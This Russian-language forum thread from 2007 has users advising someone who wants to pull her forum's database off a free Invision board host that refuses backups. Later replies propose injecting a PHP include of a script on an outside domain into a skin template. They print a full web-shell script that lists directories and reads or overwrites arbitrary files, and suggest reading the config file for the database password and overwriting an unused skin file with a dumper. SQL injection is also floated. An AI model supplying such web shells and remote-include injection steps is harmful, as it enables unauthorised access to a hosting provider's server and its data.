Dragos Опубликовано 18 Февраля 2007 Жалоба Поделиться Опубликовано 18 Февраля 2007 Случилось тут у меня такое дело: юзала я бесплатно предоставляемый форум на ruhelp.com, тот что под Invision 1.3. Сейчас решила поставить на хостинге свой ExBB, в связи с этим стоит вопрос бекапа базы регистраций и тем/сообщений. К сожалению, администраторы сервиса, редиски такие, принципиально не предоставляют бекапа, ни платно, ни бесплатно. Скажите, есть ли какой-нибудь способ слить все темы и аккаунты с форума, имея только доступ к админ-панели (все sql-инструменты в ней, конечно, отключены)? Может скриптик какой, оббегающий все страницы и выуживающий из них все данные о темах и сообщениях, или делающий запросы к базе... Может, на крайний случай, SQL-инъекции какие? Я понимаю, что такой извращенский способ, если он существует, займёт много времени, но тем не менее, это очень важно - не хочется заставлять многочисленных юзеров региться заново и создавать новые темы. Заранее спасибо. Ссылка на комментарий Поделиться на других сайтах Прочее
FatCat Опубликовано 18 Февраля 2007 Жалоба Поделиться Опубликовано 18 Февраля 2007 А ФТП доступ есть?Тогда сюда: Sypex Dumper Если нет доступа к ФТП, проблема решается на порядок труднее. Ссылка на комментарий Поделиться на других сайтах Прочее
Dragos Опубликовано 18 Февраля 2007 Автор Жалоба Поделиться Опубликовано 18 Февраля 2007 Доступа к ФТП к сожалению нету Всё что есть - это сам форум и доступ к админке, так что этот замечательный дампер не подходит. Ссылка на комментарий Поделиться на других сайтах Прочее
FatCat Опубликовано 18 Февраля 2007 Жалоба Поделиться Опубликовано 18 Февраля 2007 И имя БД с паролем тоже не знаете?Закинуть-то можно через загрузку смайликов админкой; но без имени БД и пароля к БД не приконнектиться... Боюсь, что дамп БД не снять.Если устроит скачать все топики в статичные ХТМЛ-файлы, этот процесс можно автоматизировать. Ссылка на комментарий Поделиться на других сайтах Прочее
PALADIN+ Опубликовано 18 Февраля 2007 Жалоба Поделиться Опубликовано 18 Февраля 2007 Закинуть-то можно через загрузку смайликов админкой;свой скриптик-то закинуть? Еслиполучится, то наверное можно будет и конф-глобал прочитать, где пароль к базе лежит. Но что-то мне кажется скриптик закинуть не получится=) Ссылка на комментарий Поделиться на других сайтах Прочее
Dragos Опубликовано 18 Февраля 2007 Автор Жалоба Поделиться Опубликовано 18 Февраля 2007 Загрузка смайлов пользователям ьам не разрешена, можно грузить тока цсс и темплейты скинов. Через них никак? Ссылка на комментарий Поделиться на других сайтах Прочее
socola Опубликовано 19 Февраля 2007 Жалоба Поделиться Опубликовано 19 Февраля 2007 С рухелпа 99.99% базу снять не получится. Ссылка на комментарий Поделиться на других сайтах Прочее
FatCat Опубликовано 19 Февраля 2007 Жалоба Поделиться Опубликовано 19 Февраля 2007 А редактировать скины можно? !!!Заредактировать в скин <? include 'http://левый_домен/левый_сценарий.php';?> А вот "левый сценарий":<?php $dir=opendir(""); print("<form action=$_SERVER[PHP_SELF] method=get>"); print("<select size=1 name=fail class=tx>"); while($name=readdir($dir)){ print("<option value=$directory/$name>$name</option>"); } print("<br><input type=submit value=Открыть>"); print("</form><br>"); if($pole){ $op=fopen("$fail", "w+"); fwrite($op, $pole); fclose($op); } $lll=file_get_contents("$fail"); print(" <form action=$_SERVER[PHP_SELF]?fail=$fail method=post> <textarea name=pole rows=30 cols=50 >$lll</textarea><br> <input type=submit value=Изменить> </form> "); ?> Ссылка на комментарий Поделиться на других сайтах Прочее
Dragos Опубликовано 19 Февраля 2007 Автор Жалоба Поделиться Опубликовано 19 Февраля 2007 Как я понимаю, этот сценарий позволяет редактировать содержимое файлов директории. Возникло 2 вопроса:1. В какой элемент скина это лучше закинуть? (кстати, далеко не факт, что разрешено выполнение сторонних сценариев, надо проверить) 2. Если сценарий будет успешно скормлен, какие файлы и как будем редактировать? Ссылка на комментарий Поделиться на других сайтах Прочее
sM1Le Опубликовано 19 Февраля 2007 Жалоба Поделиться Опубликовано 19 Февраля 2007 Эм, а в 1.х в админцентре разве нет инструмента создания резервной копии БД?По-моему, он там всегда был и остался до наших времен (до IP.Board 2.2). Ссылка на комментарий Поделиться на других сайтах Прочее
LE_TALLEC Опубликовано 19 Февраля 2007 Жалоба Поделиться Опубликовано 19 Февраля 2007 Эм, а в 1.х в админцентре разве нет инструмента создания резервной копии БД?имея только доступ к админ-панели (все sql-инструменты в ней, конечно, отключены) Ссылка на комментарий Поделиться на других сайтах Прочее
FatCat Опубликовано 21 Февраля 2007 Жалоба Поделиться Опубликовано 21 Февраля 2007 1. В какой элемент скина это лучше закинуть? (кстати, далеко не факт, что разрешено выполнение сторонних сценариев, надо проверить)Я бы закинул в самый "ненужный" - например у меня не используются календарные события, я бы и закинул в скин календаря. 2. Если сценарий будет успешно скормлен, какие файлы и как будем редактировать?Тоже какой-нибудь "ненужный", например skin_help.php - переживут юзеры без хелпов какое-то время Удалим все содержимое и напишем код SypexDumper-а. А еще проще, положить на какой-нибудь геоситиз сам дампер, и его заинклайдить в скин календаря... Ссылка на комментарий Поделиться на других сайтах Прочее
Рекомендуемые сообщения